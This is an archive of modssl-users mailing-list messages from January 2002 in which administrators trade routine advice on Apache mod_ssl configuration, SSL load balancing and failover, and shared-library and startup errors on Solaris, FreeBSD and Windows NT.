John.Airey@rnib.org.uk Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145]) by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g0PEhIv24984 for ; Fri, 25 Jan 2002 14:43:23 GMT Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21) id ; Fri, 25 Jan 2002 14:45:31 -0000 Message-ID: <9B66BBD37D5DD411B8CE00508B69700F02066CFC@pborolocal.rnib.org.uk> To: modssl-users@modssl.org Subject: RE: SSL Proxy with Strong Authentication Date: Fri, 25 Jan 2002 14:45:42 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: John.Airey@rnib.org.uk X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is the kind of thing within the virtual host configuration on the machine you are proxying to: Order deny,allow Deny from all Allow from 10. AuthType Basic AuthName "Outside users" AuthDBUserFile /path/to/dbuserfile require valid-user satisfy any This assumes that your internal network is a class A network starting with 10. as defined in RFC1918. Internal users get in immediately. You have to use dbmmanage to manage the dbuserfile. It is a good idea to ensure that the web server has only read-only access to this file. This works because "/" appears in every single web request, so will match all requests under your secure site. - John Airey Internet systems support officer, ITCSD, Royal National Institute for the Blind, Bakewell Road, Peterborough PE2 6XU, Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk Agnostic (Greek) = Ignoramus (Latin) >-----Original Message----- >From: Mike Murray [mailto:mmurray@ncircle.com] >Sent: 24 January 2002 23:49 >To: users@httpd.apache.org; modssl-users@modssl.org >Subject: SSL Proxy with Strong Authentication > > >-----BEGIN PGP SIGNED MESSAGE----- >Hash: SHA1 > >Hi all, > >I'm investigating using Apache and SSL for (reverse) proxying >HTTPS requests; >however, one of the requirements of the task is to have a strong auth >mechanism in place. > >I had two ideas, both of which have lead me to a dead end: > >1. Use the ProxyPass and ProxyPassReverse directives to authorize >connections, and requiring client certs to authenticate to the server. > >2. Using a normal SSL page to authenticate via client certs, >and using an >.htaccess file in the DocRoot of the proxy server to auth IP >addresses. > >Both seemed likely, and both have failed. The first because >the directives >don't work as I had hoped, and the second because I can't find >anywhere to >put an .htaccess file that makes sense to the proxy> section. > >So, this is a two-part question: first, does anybody have any >idea on how to >use .htaccess to control access to the proxy, and/or, does >anybody have any >ideas on what will accomplish this task? > > Thanks, > Mike > >- -- >| Mike Murray >| Scientific Technologist http://www.nCircle.com >| nCircle Network Security >-----BEGIN PGP SIGNATURE----- >Version: GnuPG v1.0.6 (FreeBSD) >Comment: For info see http://www.gnupg.org > >iD8DBQE8UJ1WSZ6Dtue7Vb4RAsDDAJwMg0CCcY70/0ombK2ryyN7LkF1ugCfQHsy >42fEW4GwPOUph+5Jo8tQPBo= >=gyM/ >-----END PGP SIGNATURE----- >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > - NOTICE: The information contained in this email and any attachments is confidential and may be legally privileged. If you are not the intended recipient you are hereby notified that you must not use, disclose, distribute, copy, print or rely on this email's content. If you are not the intended recipient, please notify the sender immediately and then delete the email and any attachments from your system. RNIB has made strenuous efforts to ensure that emails and any attachments generated by its staff are free from viruses. However, it cannot accept any responsibility for any viruses which are transmitted. We therefore recommend you scan all attachments. Please note that the statements and views expressed in this email and any attachments are those of the author and do not necessarily represent those of RNIB. RNIB Registered Charity Number: 226227 Website: http://www.rnib.org.uk ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 25 16:41:18 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA16693; Fri, 25 Jan 2002 16:40:25 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail1.teleshaper.com id QAA16683; Fri, 25 Jan 2002 16:40:14 +0100 (MET) Received: (qmail 6982 invoked from network); 25 Jan 2002 15:20:58 -0000 Received: from unknown (HELO thenewpush.com) (bnagy@thenewpush.com@64.32.183.125) by olympus with RC4-MD5 encrypted SMTP; 25 Jan 2002 15:20:58 -0000 Message-ID: <3C517CAC.D4DB67D9@thenewpush.com> Date: Fri, 25 Jan 2002 08:41:32 -0700 From: =?iso-8859-1?Q?Bal=E1zs?= Nagy Organization: theNewPush, llc. X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Apache SSL redundancy References: <20020125140521.GB13820@marvin-lnx.int.tele.dk> Content-Type: multipart/mixed; boundary="------------6DD0657ADC5B28D71523E670" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: =?iso-8859-1?Q?Bal=E1zs?= Nagy X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. --------------6DD0657ADC5B28D71523E670 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Mads Toftum wrote: > > On Fri, Jan 25, 2002 at 02:41:46PM +0100, Thierry Coopman wrote: [snip] > > Now, what ahppens on a failure? > > - The server(s) that still exist can take over the ip address of the failing > > server > > - The LoadBalancing system detects it and doesn't use the machine any more. > > > > On the SSL side, since the server that fails over doesn't have the SSL > > session, the browser connecting to it fails to communicate. > > > That shouldn't be the case - if the session is either unavailable or has > expired on the server side, then the server and client will just negotiate > a new session. The problem is not that much the SSL session (as it can be renegotiated), but the 'business logic' session. Say you are in the middle of a transaction, like Credit Card auth, and the server fails, you need to make sure, that the transaction either: - rolls back entirely, or - is passed on the the next server that gets the connection. You can achieve that by using databases (clusters if you can afford it) or EJBs (Enterprise Java Beans) that have their own mechanism (using database persistence and other goodies) to ensure transaction integrity. [snip] --------------6DD0657ADC5B28D71523E670 Content-Type: text/x-vcard; charset=us-ascii; name="bn.vcf" Content-Description: Card for Balázs Nagy Content-Disposition: attachment; filename="bn.vcf" Content-Transfer-Encoding: 7bit begin:vcard n:Nagy;Balázs tel;fax:720-294-0933 tel;work:303-523-5729 x-mozilla-html:FALSE url:http://www.thenewpush.com org:theNewPush, llc;Research & Development adr:;;601 16th Street #C-391;Golden;CO;80401;USA version:2.1 email;internet:bn@thenewpush.com title:Managing Partner fn:Balázs Nagy end:vcard --------------6DD0657ADC5B28D71523E670-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 25 16:55:56 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA18219; Fri, 25 Jan 2002 16:54:36 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from naxos.pdb.sbs.de id QAA18111; Fri, 25 Jan 2002 16:53:30 +0100 (MET) Received: from trolli.pdb.fsc.net (ThisAddressDoesNotExist [172.25.97.20] (may be forged)) by naxos.pdb.sbs.de (8.11.2/8.11.2) with ESMTP id g0PFrO120542 for ; Fri, 25 Jan 2002 16:53:24 +0100 Received: from deejai2.mch.fsc.net (deejai2.mch.fsc.net [172.25.124.236]) by trolli.pdb.fsc.net (8.9.3/8.9.3) with ESMTP id QAA05879 for ; Fri, 25 Jan 2002 16:53:24 +0100 Received: (from martin@localhost) by deejai2.mch.fsc.net (8.11.6/8.11.6) id g0PFrOn64927 for modssl-users@modssl.org; Fri, 25 Jan 2002 16:53:24 +0100 (CET) (envelope-from martin) Received: from trolli.pdb.fsc.net (ThisAddressDoesNotExist [172.25.97.20] (may be forged)) by naxos.pdb.sbs.de (8.11.2/8.11.2) with ESMTP id g0PFdP118849 for ; Fri, 25 Jan 2002 16:39:25 +0100 Received: from deejai2.mch.fsc.net (deejai2.mch.fsc.net [172.25.124.236]) by trolli.pdb.fsc.net (8.9.3/8.9.3) with ESMTP id QAA05365 for ; Fri, 25 Jan 2002 16:39:25 +0100 Received: from Fujitsu-Siemens.com (deejai2.mch.fsc.net [172.25.124.236]) by deejai2.mch.fsc.net (8.11.6/8.11.6) with ESMTP id g0PFdO964527 for ; Fri, 25 Jan 2002 16:39:24 +0100 (CET) (envelope-from Martin.Kraemer@Fujitsu-Siemens.com) Message-ID: <3C517C2C.2FE9499A@Fujitsu-Siemens.com> Date: Fri, 25 Jan 2002 16:39:24 +0100 From: Martin Kraemer Organization: Fujitsu-Siemens GmbH Germany X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.2 i386) X-Accept-Language: en;q=0.5, fr;q=0.3, th;q=0.2, de-by;q=0.9, de;q=1 MIME-Version: 1.0 To: modssl-dev@modssl.org Subject: FreeBSD: httpd in free(): warning: modified (chunk-) pointer Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Martin Kraemer X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I haven't nailed down this bug yet, but here is the symptom: * on FreeBSD-4.5RC, * install Apache-1.3.23+mod_ssl, but don't "make certificate" * apachectl startssl then I see this in the error log: [Fri Jan 25 15:28:44 2002] [error] mod_ssl: Init: Unable to read server certificate f rom file /opt/apache/conf/ssl.crt/server.crt (OpenSSL library error follows) [Fri Jan 25 15:28:44 2002] [error] OpenSSL: error:0D0680A8:asn1 encoding routines:ASN 1_CHECK_TLEN:wrong tag [Fri Jan 25 15:28:44 2002] [error] OpenSSL: error:0D07803A:asn1 encoding routines:ASN 1_ITEM_EX_D2I:nested asn1 error httpd in free(): warning: modified (chunk-) pointer httpd in free(): warning: modified (chunk-) pointer I expect the first messages. The latter two come from libc: /usr/src/lib/libc/stdlib/malloc.c: ... /* Check the pointer for sane values */ if (((u_long)ptr & ((*mp)->size-1))) { wrtwarning("modified (chunk-) pointer\n"); return 0; } ... Is it possible that something has been tramped upon? (Maybe in OpenSSL) Martin -- | Fujitsu Siemens Fon: +49-89-636-46021, FAX: +49-89-636-47655 | 81730 Munich, Germany ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 25 17:41:23 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA23682; Fri, 25 Jan 2002 17:40:47 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail1-gui.server.ntli.net id RAA23521; Fri, 25 Jan 2002 17:39:38 +0100 (MET) Received: from simonp90pc ([213.107.76.160]) by mail1-gui.server.ntli.net (Post.Office MTA v3.1 release PO203a ID# 0-33929U70000L2S50) with SMTP id AAA15874 for ; Fri, 25 Jan 2002 16:39:36 +0000 From: "Simon Ritchie" To: Subject: RE: Solaris + Apache Date: Fri, 25 Jan 2002 16:40:34 -0000 Message-ID: <001601c1a5bf$02851fe0$0200a8c0@home> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 In-Reply-To: <00f801c1a385$368c0b50$6401a8c0@cd58020a> Importance: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Simon Ritchie" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > When I try and start Apache 1.3.22 on Solaris 8 I get: > > bash-2.03# /usr/local/apache/bin/apachectl start > ld.so.1: /usr/local/apache/bin/httpd: fatal: libssl.so.0: open failed: > No such file or directory This also happens on Linux and there it's caused by the shared library cache mechanism. This holds information about the shared libraries on the system, but only the ones that it knows about. The effect is that you can only put shared libraries in certain directories and the system doesn't see new ones until you refresh the cache. By default the cache update doesn't scan the directory where apache puts its shared libararies. I think that Solaris has a similar mechanism to Linux, but the details of how you update the cache are different. Try looking in the manual entry for the shared library link tool (ld.so on Linux, maybe something else on Solaris). If there is nothing in there, the "See Also" section may point you to the right place. Simon ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Jan 26 00:03:55 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id AAA00968; Sat, 26 Jan 2002 00:02:03 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from brooks.civeng.adelaide.edu.au id AAA00821; Sat, 26 Jan 2002 00:00:37 +0100 (MET) Received: by brooks.civeng.adelaide.edu.au (8.12.0/8.12.0) id g0PLKsh5001613; Sat, 26 Jan 2002 07:50:54 +1030 (CST) Received: from 129.127.16.197 (SquirrelMail authenticated user sgcarr) by brooks.civeng.adelaide.edu.au with HTTP; Sat, 26 Jan 2002 07:50:54 +1030 (CST) Message-ID: <42667.129.127.16.197.1011993654.squirrel@brooks.civeng.adelaide.edu.au> Date: Sat, 26 Jan 2002 07:50:54 +1030 (CST) Subject: RE: Solaris + Apache From: "Stephen Carr" To: In-Reply-To: <001601c1a5bf$02851fe0$0200a8c0@home> References: <001601c1a5bf$02851fe0$0200a8c0@home> X-Priority: 3 Importance: Normal X-MSMail-Priority: Normal X-Mailer: SquirrelMail (version 1.2.3 [cvs]) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Stephen Carr" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Dear Simon A quick hack is to put a symbolic link in /usr/lib for libssl.o Regards Stephen Carr Simon Ritchie said: >> When I try and start Apache 1.3.22 on Solaris 8 I get: >> >> bash-2.03# /usr/local/apache/bin/apachectl start >> ld.so.1: /usr/local/apache/bin/httpd: fatal: libssl.so.0: open failed: >> No such file or directory > > This also happens on Linux and there it's caused by the shared library > cache mechanism. This holds information about the shared libraries on > the system, but only the ones that it knows about. The effect is that > you can only put shared libraries in certain directories and the system > doesn't see new ones until you refresh the cache. By default the cache > update doesn't scan the directory where apache puts its shared > libararies. > > I think that Solaris has a similar mechanism to Linux, but the details > of how you update the cache are different. Try looking in the manual > entry for the shared library link tool (ld.so on Linux, maybe something > else on Solaris). If there is nothing in there, the "See Also" section > may point you to the right place. > > Simon > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org -- Computing Officer Department of Civil and Environmental Engineering Adelaide University Tel +618-8303-4313 Fax +618-8303-4359 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Jan 26 00:25:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id AAA03411; Sat, 26 Jan 2002 00:24:31 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bubblehouse.divisionbyzero.com id AAA03398; Sat, 26 Jan 2002 00:24:07 +0100 (MET) Received: from devotchka.sonicopia.com (adsl-63-194-199-37.dsl.snfc21.pacbell.net [63.194.199.37]) by bubblehouse.divisionbyzero.com (Postfix) with ESMTP id 8DDB75BD86 for ; Fri, 25 Jan 2002 11:14:56 -0800 (PST) Subject: Re: strange problem with unclean shutdown From: jon schatz To: modssl-users@modssl.org In-Reply-To: <20020124172434.A7207812@ohm.arago.de> References: <1011811939.1018.0.camel@devotchka.sonicopia.com> <1011818751.1018.8.camel@devotchka.sonicopia.com> <20020124172434.A7207812@ohm.arago.de> Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-96srKBmA0TbTB9fxXbwl" X-Mailer: Evolution/1.0.1 Date: 25 Jan 2002 10:05:46 -0800 Message-Id: <1011981947.8171.104.camel@devotchka.sonicopia.com> Mime-Version: 1.0 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: jon schatz X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users --=-96srKBmA0TbTB9fxXbwl Content-Type: text/plain Content-Transfer-Encoding: quoted-printable On Thu, 2002-01-24 at 08:24, Thomas Binder wrote: > Test this using OpenSSL's s_client: [jon@devotchka jon]$ openssl s_client -quiet -connect devotchka:23456 < GET / HTTP/1.1 > Host: devotchka >=20 > EOF <----snip----> HTTP/1.1 200 OK Date: Fri, 25 Jan 2002 17:56:17 GMT Server: Apache/1.3.22 (Unix) mod_ssl/2.8.5 OpenSSL/0.9.6b mod_perl/1.26 <---snip----> again, ignoring the environment variables i set. I'm now fairly positive that this is an apache bug, because these lines: SetEnv downgrade-1.0 SetEnv force-response-1.0 aren't respected in the main (non-ssl) container either: [jon@devotchka conf]$ telnet devotchka 12345 Trying 192.168.1.106... Connected to devotchka. Escape character is '^]'. GET / HTTP/1.1=20 Host: devotchka.sonicopia.com User-Agent: Mozilla/4.0 Connection: close HTTP/1.1 200 OK Date: Fri, 25 Jan 2002 18:00:42 GMT Server: Apache/1.3.22 (Unix) mod_ssl/2.8.5 OpenSSL/0.9.6b mod_perl/1.26 Since apache 1.2.23 came out last night, I'm going to wait until mod_ssl is released for 1.2.23. If the problem still exists, i'm submitting this to the apache-httpd bug db... -jon --=20 jon@divisionbyzero.com || www.divisionbyzero.com gpg key: www.divisionbyzero.com/pubkey.asc think i have a virus?: www.divisionbyzero.com/pgp.html "You are in a twisty little maze of Sendmail rules, all confusing."=20 --=-96srKBmA0TbTB9fxXbwl Content-Type: application/pgp-signature; name=signature.asc Content-Description: This is a digitally signed message part -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQA8UZ56wj1gFegse14RApIpAKCD5yd18chMHT5Ke/LFIczzhnr1cgCfReXZ 5K08irLXDAMf2oZxGH++hQw= =G1Tz -----END PGP SIGNATURE----- --=-96srKBmA0TbTB9fxXbwl-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Jan 26 00:55:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id AAA04271; Sat, 26 Jan 2002 00:54:29 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from statler.squaretrade.com id AAA04256; Sat, 26 Jan 2002 00:53:57 +0100 (MET) Received: from glen by statler.squaretrade.com with local (Exim 3.33 #1 (Debian)) id 16UBxR-0004hr-00 for ; Fri, 25 Jan 2002 11:24:17 -0800 Date: Fri, 25 Jan 2002 11:24:17 -0800 To: modssl-users@modssl.org Subject: Re: Apache SSL redundancy Message-ID: <20020125192417.GC17384@squaretrade.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.25i From: Glen Mehn Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Glen Mehn X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users comments intertwined: On Fri, Jan 25, 2002 at 02:41:46PM +0100, Thierry Coopman wrote: > Hi, > > I'm trying to do this. The main problem is HTTPS session IDs I guess. This > makes load-balancing a bit more complicated since you need to forward every > request to the same server that has the sessionID. This is doable with Linux > LVS, your firewall or with HW load-balancing kit. works just fine: LVS, foundry serverirons, cisco directors, bigIP, , others I'm sure... > Now, what ahppens on a failure? > - The server(s) that still exist can take over the ip address of the failing > server > - The LoadBalancing system detects it and doesn't use the machine any more. indeed. > On the SSL side, since the server that fails over doesn't have the SSL > session, the browser connecting to it fails to communicate. no, the key gets renegociated > I'm not sure if it is safe to use the same cert for every machine, or that > it is a requirement to have the same cert on every machine. it depends. I've got a couple fo clusters of machines. Where state on teh server side (app server) doesn't matter, IIRC you can use the same SSL cert signed, as the machine doesn't really matter. However, I think that you may get bouncing SSL sessions between servers. Where you need state you'll want different certs for each machine. > Verisign requires you to ask for a different certificate for every server > (with a different OU) in a cluster. (I think this is just a commercial > reason, not a technical reason, but I'm not sure) nah, they just want more of your money, and then when you have a problem, they'll make you pay to ignore you (IMHO) > It is possible to sync the session cache over different hosts with things > like Splash but I haven't found an > implementation with mod_ssl (only Apache-SSL) hrm... dunno. > I would be gratefull if someone has a clean solution or if there is someone > with experience on trying to accomplish this. another caveat that i've found to be problematic is when going from http to https (or the other way round) you can lose state as you go from one machien to the other. The load balancers do a pretty good job of the work, however, we've definitely seen jumpage from aol and webtv clients, as well as IIRC earthlink and mindspring==- where the routing is complex, and there can be multiple public IPs that a single session proxy can come from. I've seen requests from different IPs coming in with the same cookie or session IDs. it's an imperfect solution, and we're still working on ours. One thing i've thought of doing has been to setup a linux-vs cluster for the straight port-forwarding, then use apache/mod_ssl to handle the ssl negotiations, and pass it on to the real app server with mod_proxy. glen -- Glen S Mehn Lead Systems Administrator SquareTrade, Inc glen@squaretrade.com Building Trust in Transactions (sm) ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Jan 26 03:20:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA09632; Sat, 26 Jan 2002 03:19:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from statler.squaretrade.com id DAA09595; Sat, 26 Jan 2002 03:18:20 +0100 (MET) Received: from glen by statler.squaretrade.com with local (Exim 3.33 #1 (Debian)) id 16UIAl-0000hF-00 for ; Fri, 25 Jan 2002 18:02:27 -0800 Date: Fri, 25 Jan 2002 18:02:27 -0800 To: modssl-users@modssl.org Subject: Re: Solaris + Apache Message-ID: <20020126020227.GJ1340@squaretrade.com> References: <001601c1a5bf$02851fe0$0200a8c0@home> <42667.129.127.16.197.1011993654.squirrel@brooks.civeng.adelaide.edu.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <42667.129.127.16.197.1011993654.squirrel@brooks.civeng.adelaide.edu.au> User-Agent: Mutt/1.3.25i From: Glen Mehn Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Glen Mehn X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users IIRC you have to update your LD_LIBRARY_PATH to find libssl.o. though I think what I did is below... -g On Sat, Jan 26, 2002 at 07:50:54AM +1030, Stephen Carr wrote: > Dear Simon > > A quick hack is to put a symbolic link in /usr/lib for libssl.o > > Regards > Stephen Carr > > Simon Ritchie said: > >> When I try and start Apache 1.3.22 on Solaris 8 I get: > >> > >> bash-2.03# /usr/local/apache/bin/apachectl start > >> ld.so.1: /usr/local/apache/bin/httpd: fatal: libssl.so.0: open failed: > >> No such file or directory > > > > This also happens on Linux and there it's caused by the shared library > > cache mechanism. This holds information about the shared libraries on > > the system, but only the ones that it knows about. The effect is that > > you can only put shared libraries in certain directories and the system > > doesn't see new ones until you refresh the cache. By default the cache > > update doesn't scan the directory where apache puts its shared > > libararies. > > > > I think that Solaris has a similar mechanism to Linux, but the details > > of how you update the cache are different. Try looking in the manual > > entry for the shared library link tool (ld.so on Linux, maybe something > > else on Solaris). If there is nothing in there, the "See Also" section > > may point you to the right place. > > > > Simon > > > > ______________________________________________________________________ > > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > > User Support Mailing List modssl-users@modssl.org > > Automated List Manager majordomo@modssl.org > > > -- > Computing Officer > Department of Civil and Environmental Engineering > Adelaide University > Tel +618-8303-4313 > Fax +618-8303-4359 > > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org -- Glen S Mehn Lead Systems Administrator SquareTrade, Inc glen@squaretrade.com Building Trust in Transactions (sm) ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Jan 26 10:11:03 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA24524; Sat, 26 Jan 2002 10:10:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id KAA24500; Sat, 26 Jan 2002 10:09:04 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 2E8544CE674; Sat, 26 Jan 2002 10:09:04 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g0Q96ml17518; Sat, 26 Jan 2002 10:06:48 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from va1mail.dyncorp.com id AAA00895; Sat, 26 Jan 2002 00:01:29 +0100 (MET) Received: from va1nt1.Dyncorp.com (va1nt1.dyncorp.com [199.11.48.105]) by va1mail.dyncorp.com (8.9.3/8.9.3) with ESMTP id PAA27610 for ; Fri, 25 Jan 2002 15:53:04 -0500 (EST) Received: by va1nt1.dyncorp.com with Internet Mail Service (5.5.2653.19) id ; Fri, 25 Jan 2002 15:51:29 -0500 Message-ID: <2F15531C24354A4DBF4F5CE867D27CE3B3071D@va9ex2nt> From: "Ho, Alexander" To: "'modssl-users@modssl.org'" Subject: Invalid Command SSLEngine problem on NT Date: Fri, 25 Jan 2002 15:55:14 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Ho, Alexander" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, I followed the directions at http://www.galatea.com/flashguides/apache-ssl-win32.xml to install SSL apache on my Windows NT box. The installation procedure went fine. But, when I ran apache with "apache -D SSL", as suggested on that page, I get the error "Invalid command 'SSLEngine', perhaps mis-spelled..." I searched the web and found that there are few others also have the same problem. No one seems to have a direct answer for the problem. So, if anyone has seen and fixed this problem, please share it with me. Best Regards, ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Jan 26 14:27:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA12391; Sat, 26 Jan 2002 14:21:08 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from spong.regiocom.net id OAA12122; Sat, 26 Jan 2002 14:19:31 +0100 (MET) Received: from web by spong.regiocom.net with local (Exim 3.13 #1) id 16USjy-00086K-00 for modssl-users@modssl.org; Sat, 26 Jan 2002 14:19:30 +0100 To: modssl-users@modssl.org Subject: Re: Invalid Command SSLEngine problem on NT Message-ID: <1012051169.3c52ace203f02@webmail.regiocom.net> Date: Sat, 26 Jan 2002 14:19:30 +0100 (CET) From: NickM References: <2F15531C24354A4DBF4F5CE867D27CE3B3071D@va9ex2nt> In-Reply-To: <2F15531C24354A4DBF4F5CE867D27CE3B3071D@va9ex2nt> MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 8bit User-Agent: IMP/PHP IMAP webmail program 2.2.0 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: NickM X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Can't answer your question, but just wanted to ask if you know that you can download an already compiled version fot windows in the modssl contribution area: http://www.modssl.org/contrib/ Nick Quoting "Ho, Alexander" : > > Hi, > > I followed the directions at > http://www.galatea.com/flashguides/apache-ssl-win32.xml to install SSL > apache on my Windows NT box. The installation procedure went fine. > But, > when I ran apache with "apache -D SSL", as suggested on that page, I get > the > error "Invalid command 'SSLEngine', perhaps mis-spelled..." > > I searched the web and found that there are few others also have the > same > problem. No one seems to have a direct answer for the problem. So, if > anyone has seen and fixed this problem, please share it with me. > > Best Regards, ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Jan 27 03:27:16 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA28523; Sun, 27 Jan 2002 03:26:57 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP from hotmail.com id DAA28484; Sun, 27 Jan 2002 03:25:43 +0100 (MET) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Sat, 26 Jan 2002 11:08:05 -0800 Received: from 204.115.33.45 by lw7fd.law7.hotmail.msn.com with HTTP; Sat, 26 Jan 2002 19:08:04 GMT X-Originating-IP: [204.115.33.45] From: "Jim Lee" To: modssl-users@modssl.org Cc: modssl-announce@modssl.org Subject: Apache MOD_SSL over NAT not working Date: Sat, 26 Jan 2002 19:08:04 +0000 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 26 Jan 2002 19:08:05.0185 (UTC) FILETIME=[C87D5310:01C1A69C] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Jim Lee" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: 